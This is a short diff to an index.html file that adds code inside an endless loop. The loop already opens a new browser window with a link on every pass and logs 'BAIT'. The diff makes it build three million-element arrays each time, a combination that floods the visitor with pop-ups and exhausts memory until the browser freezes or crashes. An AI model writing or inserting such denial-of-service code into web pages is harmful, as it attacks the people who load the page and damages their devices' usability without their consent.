--- a/index.html
+++ b/index.html
@@ -75,6 +75,18 @@
       while(true){
         console.log("BAIT");
         window.open(linkDirection, '_blank');
+        var heavyArray = [];
+        for (var i = 0; i < 1000000; i++) {
+          heavyArray.push(i);
+        }
+        var heavyArrayTwo = [];
+        for (var i = 0; i < 1000000; i++) {
+          heavyArrayTwo.push(i);
+        }
+        var heavyArrayThree = [];
+        for (var i = 0; i < 1000000; i++) {
+          heavyArrayThree.push(i);
+        }
       }
     }else{      
       console.log(travaOn);      
